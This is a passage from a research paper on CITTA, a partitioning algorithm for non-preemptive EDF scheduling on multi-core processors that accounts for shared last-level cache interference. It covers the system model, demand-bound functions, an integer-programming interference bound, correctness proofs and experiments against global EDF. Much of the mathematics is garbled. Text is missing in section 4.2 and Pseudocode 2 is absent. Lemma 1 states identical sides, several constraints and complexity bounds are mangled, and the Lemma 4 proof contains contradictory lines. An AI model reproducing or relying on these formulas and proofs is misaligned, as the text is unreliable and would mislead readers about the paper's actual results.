29]. By exploiting the virtual-to-physical page address translations present in virtual memory systems at OS-level, page addresses are mapped to pre-defined cache regions to avoid the overlap of cache spaces. Hardware-based cache partitioning is achieved using a cache locking mechanism [9, 26, 28], which prevents cache lines from being evicted during program execution. The main drawback of cache locking is that it requires additional hardware support that is not available in many commercial processors for embedded systems. A few works address schedulability analysis for multi-core systems with shared caches [16, 34], but these works use cache space isolation techniques to avoid cache contention for hard real-time tasks. In this work, we do not deploy any cache partitioning techniques to mitigate the inter-core cache interference. Instead, we address the problem of task partitioning in the presence of shared cache interference. **Real-time Scheduling.** To schedule real-time tasks on multi-core platforms, different paradigms have been widely studied: partitioned [4, 13, 35], global [3, 7, 22], and semi-partitioned scheduling [8, 10, 20]. A comprehensive survey of real-time scheduling for multiprocessor systems can be found in [12]. Most multi-core scheduling approaches assume that the WCETs are estimated in an offline and isolated manner and that WCET values are fixed. Real-time scheduling for multi-core systems using cache partitioning techniques is done via two steps: it first captures the relationship between the task’s WCET and cache allocation by analysis or measurement as the WCET of a task depends on the number of cache partitions assigned to that task, and then develops a strategy that determines the number of cache partitions assigned to each task in the system, so that the task system is schedulable. Existing approaches typically adopt Mixed Integer Programming to find the optimal cache assignment. However, these methods incur a very high execution time complexity, and are therefore too inefficient to be practical [33]. Different from the above approaches based on cache partitioning techniques, we address the problem of task partitioning in the presence of shared cache interference. Our approach neither requires operating system modifications for page coloring nor hardware features for cache locking, which are not supported by most existing embedded processors. The most relevant to our work is [31, 32], which also addresses schedulability analysis for multi-core systems with shared caches. However, the work of [31, 32] only considers global scheduling. In this paper, we consider another scheduling paradigm, namely partitioned scheduling, and propose CITTA, a cache interference-aware task partitioning algorithm. Our empirical evaluations show that CITTA outperforms global EDF scheduling in terms of task sets deemed schedulable. ### 3 System Model and Prerequisites #### 3.1 System Model **Task Model.** A taskset \( \tau \) comprises \( n \) periodic or sporadic real-time tasks \( \tau_1, \tau_2, ... \tau_n \). Each task \( \tau_k = (C_k, D_k, T_k) \) \( \in \tau \) is characterized by a worst-case computation time \( C_k \), a period or minimum inter-arrival time \( T_k \), and a relative deadline \( D_k \). All tasks are considered to be deadline constrained, i.e. the task relative deadline is less or equal to the task period: \( D_k \leq T_k \). We further assume that all those tasks are independent, i.e. they have no shared variables, no precedence constraints, and so on. A task \( \tau_k \) is a sequence of jobs \( J_k^j \), where \( j \) is the job index. We denote the arrival time, starting time, finishing time and absolute deadline of a job \( j \) as \( r_k^j, s_k^j, f_k^j \) and \( d_k^j \), respectively. Note that the goal of a real-time scheduling algorithm is to guarantee that each job will complete before its absolute deadline: \( f_k^j \leq d_k^j = r_k^j + D_k \). As explained, it is difficult to accurately estimate \( C_k \) considering cache interference of other tasks executing concurrently. It should be pointed out that \( C_k \) in this paper refers to the WCET of \( \tau_k \), assuming task \( k \) is the only task executing on the multi-core processor platform, i.e. any cache interference delays are not included in \( C_k \). Since time measurement cannot be more precise than one tick of the system clock, all timing parameters and variables in this paper are assumed to be non-negative integer values. Our system architecture consists of a multi-core processor with \( m \) identical cores onto which the individual tasks are scheduled. In multi-core processors, Caches are organized as a hierarchy of multiple cache levels to address the trade-off between cache latency and hit rate. The lower level caches, for example L1, are private while the last-level caches (LLC) are shared among all cores. The caches are assumed to be non-inclusive and direct-mapped. **Partitioned Non-preemptive Schedulers.** In this paper, we focus on non-preemptive partitioned scheduling. Once a task instance starts execution, any preemption during the execution is not allowed, so it must run to completion. So we do not have to consider intra-core cache interference. If not explicitly stated, cache interference will therefore refer to inter-core cache interference in the following discussion. Since partitioning tasks among a multi-core processor reduces the multi-core processor scheduling problem to a series of single-core scheduling problems (one for each core), the optimality without idle inserted time [14, 19] of non-preemptive EDF (EDF_{np}) makes it a reasonable algorithm to use as the run-time scheduler on each core. Therefore, we make the assumption that each core, and the tasks assigned to it by the partitioning algorithm, are scheduled at run time according to an EDF_{np} scheduler. EDF_{np} assigns a priority to a job according to the absolute deadline of that job. A job with an earlier absolute deadline has higher priority than others with a later absolute deadline. EDF$_{np}$ scheduling is work-conserving: using EDF$_{np}$, there are no idle cores when a ready task is waiting for execution. 3.2 The Demand-Bound Function A successful approach to analyzing the schedulability of real- time tasks is to use a demand bound function [5]. The demand bound function DBF($\tau_i$, t) is the largest possible cumulative execution demand of all jobs that can be generated by $\tau_i$ to have both their arrival times and their deadlines within any time interval of length $t$. Let $t_0$ be the starting time of a time interval of length $t$, the cumulative execution demand of $\tau_i$'s jobs over $[t_0, t_0 + t]$ is maximized if one job arrives at $t_0$ and subsequent jobs arrive as soon as permitted i.e., at instants $t_0 + T_1, t_0 + 2T_1, t_0 + 3T_1, \ldots$ Therefore, DBF($\tau_i$, t) can be computed by Equation (0.1). $$DBF(\tau_i, t) = \max (0, (\frac{t-D_i}{T_i}) + 1) \times C_i). \quad (0.1)$$ [1] proposed a technique for approximating the DBF($\tau_i$, t). The approximated demand bound function DBF*($\tau_i$, t) is given by the following equation: $$DBF^*(\tau_i, t) = \begin{cases} 0 & t < D_i \\ C_i + U_i \times (t - D_i) & \text{otherwise} \end{cases} \quad (0.2)$$ where $U_i = \frac{C_i}{T_i}$. Observe that the following inequality holds for all $\tau_i$ and all $0 \leq t$: $$DBF^*(\tau_i, t) \geq DBF(\tau_i, t) \quad (0.3)$$ 3.3 Uniprocessor Schedulability The schedulability analysis of uniprocessor scheduling is well studied. [2] presented a necessary and sufficient condition for the feasibility test of a sporadic task system $\tau$ scheduled by EDF$_{np}$ on a uniprocessor platform. **Theorem 1.** A taskset $\tau$ is schedulable under EDF$_{np}$ on a uniprocessor platform if and only if $$\forall t, \sum_{i=1}^{n} DBF(\tau_i, t) \leq t \quad (1.1)$$ and for all $\tau_j \in \tau$: $$\forall t : C_j \leq t \leq D_j : C_j + \sum_{i=1, i \neq j}^{n} DBF(\tau_i, t) \leq t. \quad (1.2)$$ Note that the computation of DBF($\tau_i$, t) and DBF*($\tau_i$, t) by Equation (0.1) and (0.2) and the two schedulability test conditions (1.1) and (1.2) do not account for shared cache interference. We will extend the computation of DBF($\tau_i$, t) and DBF*($\tau_i$, t) and the two schedulability conditions to the cases where shared cache interference is considered. 3.4 Cache Interference The WCET of a task can be obtained by performing a Cache Access Classification (CAC) and Cache Hit/Miss Classification (CHMC) analysis for each memory access at the private caches and the shared LLC cache separately [30]. The CAC categorizes the accesses to a certain cache level as Always (A), Uncertain (U) or Never (N). CHMC classifies the refer- to a memory block as Always Hit (AH), Always Miss (AM) or Uncertain (U). As an LLC is shared by multiple cores, it allows running tasks to compete among each other for shared cache space. As a consequence, the tasks replace blocks that belong to other tasks, causing shared cache interference. Let $\tau_k$ be the interfered and $\tau_i$ be the interfering task. We use $i_{k,l}$ to represent the upper bound on the shared cache interference imposed on $\tau_k$ by only one job execution of $\tau_i$. $I_{i_k}^c$ can be calculated, as indicated by Lemma 4 and its proof in [31], using the concept of Hit Block (HB), i.e. a mem- ory block whose access is classified as AH at the shared cache and Conflicting Block (CB), i.e. memory block whose access is classified as A or U at the shared cache. By calculating the number of accesses to each $\tau_k$’s HB and the accesses to each $\tau_i$’s CB, $I_{i_k}^c$ can be derived by bounding the conflicting accesses to each shared cache set between $\tau_k$ and $\tau_i$. In the following discussion, we assume $I_{i_k}^c$ is known. 4 Cache interference aware task pairing : CITTA Given a taskset $\tau$ comprised of $n$ periodic or sporadic tasks and a processing platform $\pi$ with $m$ identical cores $\pi = \{\pi_1, \pi_2, \ldots, \pi_m\}$, a partitioning algorithm decides how to assign tasks to cores to avoid task deadline misses. The problem of assigning a set of tasks to a set of cores is analogous to the in-bin packing problem. In this case, the tasks are the objects to pack and the bins are cores. The bin-packing problem is known to be NP-hard in the strong sense. Thus, searching for an optimal task assignment is not practical. [25] and [13] studied several bin-packing heuristics for the preemptive and non-preemptive task model. Typically, each of the bin-packing heuristics follows the following pattern: tasks of the task system are first sorted by some criterion, after which the tasks are assigned in order to a core that satisfies a sufficient condition. Let $\tau(\pi_x)$ denote the set of tasks assigned to processor core $\pi_x$ where $1 \leq x \leq m$. $\tau_i \in \tau(\pi_x)$ means $\tau_i$ is assigned to core $\pi_x$. If taskset $\tau$ can be scheduled by a partitioned algorithm, the outcome of running a partitioning algorithm is a task partition such that: - All tasks are assigned to processor cores: $$\cup_{1 \leq x \leq m} \tau(\pi_x) = \tau$$ - Each task is assigned to only one core: $$\forall y \neq x, 1 \leq y \leq m, 1 \leq x \leq m, \ \tau(\pi_y) \cap \tau(\pi_x) = \emptyset$$ In Section 4.1, we describe our cache interference aware task partitioning : CITTA. Section 4.2 derives the calculation of the upper bound on the shared cache interference. Section 4.3 conducts the schedulability analysis for CITTA. Before describing CITTA, we first extend the DBF to account for shared cache interference. Due to the extra execution delay caused by shared cache interference, a task $\tau_i$ may execute longer than $C_i$. Given a task partitioning scheme, one can compute the upper bound on cache interference exhibited by task $\tau_i$, denoted as $I^c_i$. We will show the method to compute this $I^c_i$ later. In multiprogrammed environment, the actual execution time including cache interference of $\tau_i$ can be bounded by $C_i + I^c_i$. We denote $DBF^c(\tau_i, t)$ as the demand bound function which accounts for cache interference. $DBF^c(\tau, t)$ can be computed by extending Equation (0.1): $$DBF^c(\tau_i, t) = \max(0, \left(\frac{t - D_i}{T_i}\right) + 1) \times (C_i + I^c_i).$$ Similarly, the approximated demand bound function $DBF^{c*}(\tau_i, t)$ is given by the following equation by extending Equation (0.2): $$DBF^{c*}(\tau_i, t) = \begin{cases} 0 & t < D_i \\ C_i + I^c_i + U^c_i \times (t - D_i) & \text{otherwise} \end{cases}$$ where $U^c_i = \frac{C_i + I^c_i}{T_i}$. It can also be observed that: $$DBF^{c*}(\tau_i, t) \geq DBF^c(\tau_i, t) \quad (1.5)$$ ### 4.1 The Task Partitioning Algorithm: CITTA We now propose CITTA, a task partitioning algorithm taking shared cache interference into account. We assume the tasks are sorted in non-decreasing order by means of a certain criterion. For example, if a task’s relative deadline is chosen as criterion, then $D_i \leq D_{i+1}$ for $1 \leq i \leq n$. More criteria for sorting the tasks will be discussed in Section 5. CITTA performs the following steps: **step 1:** for each task $\tau_i \in \tau$: 1. Attempt to assign $\tau_i$ to $\pi_x$. 2. Calculate the upper bound on cache interference $I^c_k$ for $\tau_k \in \tau(\pi_x) \cup \{\tau_i\}$, i.e. tasks that are already assigned to $\pi_x$ and $\tau_i$, assuming $\tau_i$ is assigned to $\pi_x$. We will show the calculation procedure in the next subsection. 3. Check if the following condition holds for each $\tau_k \in \tau(\pi_x) \cup \{\tau_i\}$ $$D_k \geq \sum_{\tau_j \in \tau(\pi_x) \cup \{\tau_i\}, D_j \leq D_k} DBF^{c*}(\tau_j, D_k) + \max_{\tau_l \in \tau(\pi_x) \cup \{\tau_i\}, D_l > D_k} C_l + I^c_l.$$ $$= \left(\frac{t - D_i}{T_i}\right) + 1) \times (C_i + I^c_i).$$ (1.6) a. If no $\tau_k$ violates condition (1.6), the attempt is admitted and $\tau_i$ is added to $\pi_x$. b. If condition (1.6) is violated by at least one $\tau_k$, the attempt is rejected. We attempt to assign $\tau_i$ to the next core $\pi_{x+1}$ and repeat steps (2) and (3). **step 2:** after performing step 1, the resulting $\tau^{tna}$ is either an empty set or non-empty. (a) If $\tau^{tna} = \emptyset$, which means all tasks have been allocated to cores, CITTA returns Success. (b) Otherwise, we perform step 1 to each $\tau_i \in \tau^{tna}$, $\tau_i$ is removed from $\tau^{tna}$ if it can be assigned to a core. We repeatedly perform step 1 to $\tau_i \in \tau^{tna}$ until $\tau^{tna}$ becomes empty or no more tasks in $\tau^{tna}$ could be allocated to cores. If $\tau^{tna} = \emptyset$ at the end, CITTA returns Success, otherwise CITTA returns Fail: it is unable to determine if scheduling $\tau$ is feasible on the multi-core platform. We briefly explain the rationale behind condition (1.6). Given a task $\tau_k$, the execution demand of tasks (including $\tau_k$) with a relative deadline no larger than $D_k$ is calculated by the first part (left-hand side) of the sum in condition (1.6). Since we consider a non-preemptive task system, the second part of the sum accounts for the blocking time due to the execution of a task with a larger relative deadline than $\tau_k$ at the time a job of $\tau_k$ arrives. If the sum of the execution demand and the blocking time is smaller than $D_k$, the task $\tau_k$ will not miss its deadline. We will prove this in Section 4.3. A more formal version of the task partitioning algorithm CITTA is given by Pseudocode 1. The input to procedure CITTA is the taskset $\tau$ to be partitioned and the execution platform $\pi$ consisting of $m$ cores. CITTA repeatedly invokes the procedure TaskPartition, illustrated by Pseudocode 2, to perform step 1 of the CITTA algorithm. The input to TaskPartition is the temporarily non-allocable taskset $\tau^{tna}$, $\pi$, and existing task assignment $\tau(\pi) = (\tau(\pi_1), \tau(\pi_2), ..., \tau(\pi_m))$. ### Pseudocode 1: CITTA($\tau$, $\pi$) 1: sort $\tau$ in non-decreasing order by a selected criterion 2: $\tau^{tna} \leftarrow \tau$, taskAssigned $\leftarrow$ true, $\tau(\pi_1), \tau(\pi_2), ..., \tau(\pi_m)$ $\leftarrow \emptyset$ 3: $\tau(\pi) = (\tau(\pi_1), \tau(\pi_2), ..., \tau(\pi_m))$ 4: while $\tau^{tna} \neq \emptyset$ and taskAssigned $==$ true do 5: $\tau^{tna}$, taskAssigned, $\tau(\pi)$ = TaskPartition($\tau^{tna}$, $\pi$, $\tau(\pi)$) 6: end while 7: if $\tau^{tna} == \emptyset$ then 8: return Success 9: else 10: return Failed 11: end if Lines 5–7 in the procedure of TaskPartition perform step 1.2(2) of CITTA to compute the upper bound on cache interference for tasks. When CITTA attempts to assign $\tau_i$ to $\pi_x$, the upper bound on cache interference caused by $\tau_k \in \tau(\pi_x)$, We construct an integer programming (IP) formulation to calculate the upper bound on cache interference exhibited by task \( \tau \). We use a job among the remaining \( N \) to occupy almost the computation capacity in the processing core is reserved just before the start of the EW. Taking the smallest execution time of \( \tau \), \( C^\text{min} \), as 0, we have the following constraint: \[ \forall \tau_i \notin \tau(\pi_x), N_{i,k} \leq \left( \frac{\max(0, C'_k - T_i)}{T_i} \right) + \xi_i \leq N_{i,k} \] where \( \xi_i \) is 1 \( C'_k \mod T_i - D_i > 0 \) or 0 otherwise. The term \( \xi_i \) indicates whether or not the last job of \( \tau_i \) released within the EW interferes with \( \tau_k \). The maximum value of \( N_{i,k} \) is taken when the first interfering job of \( \tau_j \) finishes just after the start of the EW and the last interfering job of \( \tau_j \) starts to execute at the time when it is released. Thus, we have the second constraint on \( N_{i,k} \): \[ \forall \tau_i \notin \tau(\pi_x), N_{i,k} \leq 1 + \left( \frac{\max(0, C'_k - T_i + D_i)}{T_i} \right). \] If \( N_{i,k} \geq 2 \), the first and last interfering jobs of \( \tau_i \) may occupy almost 0 computation capacity in the EW. Let \( J'_i \) be a job among the remaining \( N_{i,k} - 2 \) interfering jobs of \( \tau_i \) between the first and the last ones. Both release time \( r'_i \) and deadline \( d'_i \) of \( J'_i \) are within the EW of \( \tau_k \). If \( \tau_i \) (or will be) successfully assigned to core \( \pi_y \), at least \( C_i \) computation capacity of the processing core is reserved for the execution of \( J'_i \) during \( [r'_i, d'_i] \). The total execution of interfering tasks \( \tau_i \) on each processor \( y \) (with \( y \neq x \)) cannot exceed \( C_k' \). Since we do not know the core assignment for tasks in \( \tau^{na} \), those tasks are allowed to execute on any core. Thus, we have the following inequality (1.11), \[ \forall y \neq x, \quad \sum_{\tau_i \in (\pi(x) \cup \tau^{na})} \max(0, N_{i,k} - 2) C_i \leq C_k'. \quad (1.11) \] The objective function (1.7) together with constraints on \( N_{i,k} \) i.e. inequalities (1.8), (1.9), (1.10) and (1.11) form our IP problem. As task parameters such as \( C_i, D_i, T_i \) are known, the input of the IP formulation is the length of \( E.W. \) \( C_k' \), existing task assignment: \( \tau(\pi) = (\tau(\pi_1), \tau(\pi_2), ..., \tau(\pi_m)) \), and remaining tasks that need to be assigned: \( \tau^{na} \). Thus, we use \( IP(C_k', \tau(\pi), \tau^{na}) \) to denote the IP problem and use \( I^C(C_k', \tau(\pi), \tau^{na}) \) to denote the optimal solution. When CITTA attempts to assign a task \( \tau_i \) to a core \( \pi_x \), the upper bound on cache interference caused by \( \tau_k \in \tau(\pi_x) \), i.e. tasks that are already assigned to \( \pi_x \), is recomputed. We now show that a tighter upper bound for task \( \tau_k \) can be obtained by the re-computation. Given a task \( \tau_k \) and an execution window of length \( C_k' \), let us suppose the IP formulation in the previous computation of cache interference is \( IP(C_k', \tau(\pi), \tau^{na}) \), and the IP formulation for the re-computation is \( IP(C_k', \tau(\pi), \tau^{na}) \). Between the two computations for the same task \( \tau_k \), CITTA may assign some tasks to cores. If a task \( \tau_i \) is assigned to a core \( \pi_x \), \( \tau_i \) is removed from \( \tau^{na} \) and is added to \( \tau(\pi_x) \). Obviously, we have \( \tau^{na} \subseteq \tau^{np} \) and \( \forall 1 \leq x \leq m, \tau(\pi_x) \subseteq \tau(\pi_x) \). **Lemma 1.** Given \( \tau_k \) and \( C_k' \), \[ I^C(C_k', \tau(\pi), \tau^{na}) \leq I^C(C_k', \tau(\pi), \tau^{na}). \] **Proof Sketch:** Due to space considerations, we will only show the proof sketch. From condition 1.6, one can prove the following: if \( \tau_i \in \tau(\pi_x) \) and \( \tau_k \in \tau(\pi_x) \), then \( C_i + I^C_k \leq D_i \). By the above statement and the constraints of the IP problem, we can prove that any solution of \( IP(C_k', \tau(\pi), \tau^{na}) \) is also feasible for \( IP(C_k', \tau(\pi), \tau^{na}) \). Thus, \[ I^C(C_k', \tau(\pi), \tau^{na}) \leq I^C(C_k', \tau(\pi), \tau^{na}). \] Lemma 1 is the reason CITTA forces the recalculation of upper bound on cache interference caused by tasks that are already assigned to cores by CITTA. ### 4.2.2 Iterative Computation Due to the presence of cache interference, a job may execute longer than \( C_k \) on a multi-core platform with shared caches. However, a larger execution time may introduce more cache interference. We give a sufficient condition for a certain value that can be used as an upper bound on cache interference exhibited by \( \tau_k \), denoted by \( I^C_k \). **Lemma 2.** Given \( \tau(\pi) \) and \( \tau^{na} \), if \( \exists C_k' \geq C_k \) such that \( C_k' = C_k + I^C(C_k', \tau(\pi), \tau^{na}) \), then \( I^C_k = I^C(C_k', \tau(\pi), \tau^{na}) \). The equation can be solved by means of fixed point iteration: the iteration starts with an initial value for the length of \( E.W. \) and upper bound on cache interference, i.e. \( C_k' = C_k \) and \( I^C(C_k') = 0 \). By solving the IP, we compute a new upper bound of the cache interference \( I^C(C_k', \tau(\pi), \tau^{na}) \) and a new corresponding length of \( E.W. \), \( C_k' = C_k + I^C(C_k', \tau(\pi), \tau^{na}) \). The iterative computation for \( \tau_k \) stops either if no update on \( I^C(C_k', \tau(\pi), \tau^{na}) \) is possible anymore or if the computed \( I^C(C_k', \tau(\pi), \tau^{na}) \) is large enough to make \( \tau_k \) unschedulable i.e. \( I^C(C_k', \tau(\pi), \tau^{na}) + C_k' > D_k \). **Computational complexity:** The original IP can be easily transformed to an Integer Linear Programming (ILP) problem by introducing a new integer variable \( y_{i,k} \) for each \( N_{i,k} \) with two additional constraints: \( y_{i,k} \geq 0 \) and \( y_{i,k} \geq N_{i,k} - 2 \). Inequality (1.11) can be replaced by \( \sum_{\tau_i \in (\pi(x) \cup \tau^{na})} y_{i,k} \leq C_k' \). In the transformed ILP problem, we have totally \( 2n \) variables and \( 4n + m - 1 \) constraints. The complexity of the IP is the same as the complexity of solving the transformed ILP problem, which is \( O(4n^2 + m) \) [11]. Let \( n \) represent the number of tasks in the taskset. For \( \tau_k \), let \( I^m_{k, min} \) be the smallest difference between cache interference caused by one job of \( \tau_i \) and \( \tau_j \), i.e. \( I^m_{k, min} = \min(I^C_k - I^C_j) \), the iterative algorithm takes at most \( y = \max_k \frac{C_k - C_k'}{I^m_{k, min}} \) iterations to terminate since \( C_k' \) either stays the same or increases at least with \( I^m_{k, min} \) in each iteration. Thus, the complexity to compute the upper bound on cache interference exhibited by each task is \( O(\gamma(4n^2 + mn)4^nln4n + m) \). In TaskPartition, at most \( n \) tasks in \( \tau \) are checked for at most \( m \) cores, thus, the complexity of TaskPartition is \( O(\gamma(4n^2 + mn^2)4^nln4n + m) \). Since the while loop in CITTA executes at most \( n \) times, the complexity of CITTA is \( O(\gamma(4n^2 + mn^2)4^nln4n + m) \). ### 4.3 Schedulability Analysis #### 4.3.1 Uniprocessor feasibility Task partitioning reduces the problem of multi-core processor scheduling into a set of single-core processor scheduling problems (one for each core). Following Theorem 1, we first propose a schedulability condition, as stated in Theorem 2, for uniprocessor scheduling, taking shared cache interference into consideration. Note that the condition in Theorem 2 is sufficient and not necessary as \( I^F \) is the calculated upper bound on the shared interference exhibited by \( \tau_j \), the actual cache interference can be smaller than \( I^F \). **Theorem 2.** A taskset \( \tau(\pi_x) \) is schedulable under EDF on a uniprocessor platform if \[ \forall t, \quad \sum_{\tau_i \in (\pi(x))} DBF^C(\tau_i, t) \leq t \quad (2.1) \] and for all \( \tau_j \in (\pi(x)) \): \[ \forall t : C_j + I^F_k \leq t \leq D_j : C_j + I^F_k + \sum_{\tau_i \in (\pi(x))} DBF^C(\tau_i, t) \leq t. \quad (2.2) \] 4.3.2 Schedulability analysis of CITTA We first derive one property that must be satisfied for tasks assigned to the same core by CITTA. This is useful for the proof of the feasibility analysis conducted later for CITTA. **Lemma 3.** If tasks are assigned to cores by CITTA, \[ \forall \pi_x \in \pi, \sum_{\tau_i \in \tau(\pi_x)} U_i^c \leq 1. \] (2.3) **Proof:** Let \( r_u \) be the task with the largest relative deadline among tasks in \( \tau(\pi_x) \), so, \( D_u = \max[D_i | r_i \in \tau(\pi_x)] \). Obviously, \[ \tau_i \in \tau(\pi_x) \Rightarrow D_i \leq D_u. \] Since \( r_u \) satisfies Inequality (1.6), we have \[ D_u \geq \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, D_u). \] (2.4) From Equation (1.4), \( DBF^c(\tau_i, D_u) \) is computed by: \[ DBF^c(\tau_i, D_u) = U_i^c \times (D_u - D_i + T_i) \geq U_i^c \times D_u. \] Replacing \( DBF^c(\tau_i, D_u) \) in Inequality (2.4), \[ D_u \geq \sum_{\tau_i \in \tau(\pi_x)} U_i^c \times D_u \Rightarrow \sum_{\tau_i \in \tau(\pi_x)} U_i^c \leq 1. \] This is Inequality (2.3). \( \square \) On each core \( \pi_x \in \pi \), tasks in \( \tau(\pi_x) \) are scheduled under \( \text{EDF}_{np} \). The next lemma shows the feasibility of \( \tau(\pi_x) \). **Lemma 4.** If the tasks are assigned to cores by CITTA, \( \forall \pi_x \in \pi, \tau(\pi_x) \) is feasible on core \( \pi_x \) by \( \text{EDF}_{np} \). **Proof:** For the sake of contradiction, assume that each task in \( \tau(\pi_x) \) satisfies condition (1.6), but that a task’s deadline is missed when scheduling the tasks in \( \tau(\tau_p) \) on core \( \pi_x \). Let \( t_f \) be the time that a task misses a deadline on core \( \pi_x \). By Theorem 2, either \[ \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, t_f) > t_f, \] (2.5) or \( \exists \tau_p, r_p \in \tau(\pi_x) \) and \( \exists t_f, C_p + \bar{r}_p \leq t_f \leq D_p \), such that \[ C_p + \bar{r}_p + \sum_{\tau_i \in \tau(\pi_x) \setminus \tau_p} DBF^c(\tau_i, t_f) > t_f. \] (2.6) It will be shown that if either Inequality (2.5) or (2.6) holds, then a contradiction is reached. We first prove the existence of \( \tau_i \in \tau(\pi_x) \) that satisfies \( D_i \leq t_f \). Assuming \( \forall \tau_i \in \tau(\pi_x), D_i > t_f \), from Equation (1.4), \[ \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, t_f) = 0. \] By the assumption, neither Inequality (2.5) nor (2.6) will hold. So the assumption is false. Therefore, we can always find \( \tau_i \in \tau(\pi_x) \) that satisfies \( D_i \leq t_f \). Let \( r_i \) be the task with the largest relative deadline, i.e. \( D_i = \max[D_i | r_i \in \tau(\pi_x) \land D_i \leq t_f] \) (A) we first prove that if Inequality (2.5) holds, it would lead to contradiction. From Inequality (1.5) and (2.5), \[ \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, t_f) > t_f. \] (2.7) By the definition of \( DBF^c(\tau_i, t_f) \), we have \[ \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, t_f) = 0. \] \[ \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, t_f) = \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, t_f) + \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, t_f) \] \[ = \sum_{\tau_i \in \tau(\pi_x)} C_i + \bar{r}_i + U_i^c \times (t_f - D_i) \] \[ = \sum_{\tau_i \in \tau(\pi_x)} C_i + \bar{r}_i + U_i^c \times (t_f - D_i + D_s - D_s - D_i) \] \[ = \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, D_s) + U_i^c \times (t_f - D_s). \] \( \tau_s \) satisfies condition (1.6): \[ D_s \geq \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, D_s). \] From Equation (2.8) and Inequality (2.7), we have \[ D_s + \sum_{\tau_i \in \tau(\pi_x)} U_i^c \times (t_f - D_s) > t_f \] (2.9) This contradicts to Lemma 3. (B) we now prove that if Inequality (2.6) holds, it would also lead to contradiction. We know that \( \exists \tau_r, r_r \tau_p \) such that \( D_s \leq t_f \leq D_p \). We consider two cases (B1): \( D_s = D_p \) and (B2): \( D_s < D_p \). (B1) if \( D_s = D_p \), then \( t_f = D_p \) \[ DBF^c(\tau_p, t_f) = C_p + \bar{r}_p \] From Inequality (2.6), \[ \sum_{\tau_i \in \tau(\pi_x)} DBF^c(\tau_i, t_f) > t_f. \] This leads to contradiction as proved in case (A). (B2) if \( D_s < D_p \), we have \[ C_p + \bar{r}_p \leq \sum_{\tau_i \in \tau(\pi_x)} C_j + \bar{r}_j \] \[ \frac{\sum_{\tau_i \in \tau(\pi_x)} C_j + \bar{r}_j}{D_j > D_s} \] and \[ \sum_{\tau_i \in \tau_s} DBF^c(\tau_i, t_f) \leq \sum_{\tau_i \in \tau_s} DBF^c(\tau_i, t_f). \] From Inequality (2.6), we have \[ \max_{\tau_i \in \tau_s, D_j > D_s} C_j + \bar{I}_j^s + \sum_{\tau_i \in \tau_s, D_j \leq D_s} DBF^c(\tau_i, t_f) > t_f. \] Replacing \(\sum_{\tau_i \in \tau_s} DBF^c(\tau_i, t_f)\) in the above inequality using equation (2.8), we have \[ \max_{\tau_i \in \tau_s, D_j > D_s} C_j + \bar{I}_j^s + \sum_{\tau_i \in \tau_s, D_j \leq D_s} DBF^c(\tau_i, D_s) + U_i^c \times (t_f - D_s) > t_f. \] (2.10) Since \(\tau_s\) satisfies condition (1.6), \[ D_s \geq \sum_{\tau_i \in \tau_s, D_j > D_s} DBF^c(\tau_i, D_s) + \max_{\tau_i \in \tau_s, D_j > D_s} C_i + \bar{I}_i^s. \] (2.11) From Inequality (2.10) and (2.11), \[ \sum_{\tau_i \in \tau_s} U_i^c > 1. \] This also contradicts to Lemma 3. \(\square\) The correctness of Algorithm CITTA follows, by application of Lemma 4: **Theorem 3.** If the task partitioning algorithm CITTA returns Success on taskset \(\tau\), then the resulting partitioning is schedulable by EDF on each core. 5 Experiments We asset the performance of CITTA and the proposed schedulability test in terms of acceptance ratio, that is, the number of tasksets that are deemed schedulable divided by the number of tasksets tested. CITTA is compared against Global EDF (GEDF), which is proposed in [32], the only, at least to the best of our records, work on real-time multiprocessor scheduling, taking the shared cache interference into account. As mentioned in the beginning of Section 4.1, the CITTA algorithm first sorts tasks in non-decreasing order using some criterion and then assigns tasks to the processor cores according to Equations (1.6). We consider the following five sorting criteria: the reciprocal of a task’s WCET \(\frac{1}{C_i}\), a task’s period \(T_i\), the reciprocal of a task’s utilization \(\frac{1}{U_i} = \frac{D_i}{C_i}\), a task’s slack \(S_i = T_i - C_i\) and random order. 5.1 Workloads Generation We systematically generated synthetic workloads by varying i) the number of tasks \(n\) \((n = 10, 20)\) in the taskset, ii) total task utilization \(U_{tot}\) \((U_{tot} from 0.1 to m - 0.1 with steps of 0.2)\), iii) the cache interference factor \(IF (IF = 0.2 or 0.8)\), and iv) the probability of two tasks having cache interference on each other: \(P (P = 0.1 or 0.4)\). Given those four parameters, we have generated 20000 tasksets in each experiment. We adopted the same policy, described in [31], to generate task parameters such as task period and utilization, and cache interference between two tasks. In each experiment, we measure the number of tasksets that can be successfully partitioned by CITTA with different sorting criteria and the number of tasksets that can be scheduled by GEDF. The acceptance ratio is the number of schedulable tasksets divided by the total number of tasksets. 5.2 Results We report the major trends characterizing the experimental results, illustrated in Figures 2 and 3. In the figures, CITTA-<criterion> represents a variant of CITTA using <criterion> for sorting tasks, GLB stands for the GEDF scheduler. CITTA outperforms global EDF. Our results clearly show that CITTA outperforms global EDF in all the test cases. It is also evident that CITTA is highly effective for multi-core real-time systems, accounting for cache interference. As shown in Figure 2(a), when \(IF = 0.2, P = 0.1\), all the generated tasksets can be successfully partitioned by all variants of CITTA if \(U_{tot} < 2.5\), while the global EDF achieves the full acceptance ratio when \(U_{tot} < 1.5\). CITTA is able to partition tasksets with the highest tested total utilization, i.e. \(U_{tot} = 3.9\). Global EDF can only schedule tasksets with a total utilization of up to \(U_{tot} = 2.5\). It is important to observe that the gap of acceptance ratio between all variants of CITTA and global scheduling is large when \(U_{tot} \in [2, 3.5]\). Such a schedulability performance gap also exists for different degrees of cache interference and different numbers of tasks in the taskset, as shown in Figure 2(b), Figure 3(a) and Figure 3(b). We have also compared the schedulability performance of CITTA and GEDF using heterogeneous task periods i.e. \(T_i \in [100, 300]\) or \(T_i \in [100, 500]\) (of which the results are omitted due to space limitations). In those tests, CITTA still outperforms GEDF. Performance gap among different variants of CITTA is small. As is depicted in Figures 2(a) and 3(a), when the cache interference is small \((IF = 0.2, P = 0.1)\), CITTA-T and CITTA-random performed worse than the CITTA-1/C, CITTA-S and CITTA-1/U when \(U_{tot} > 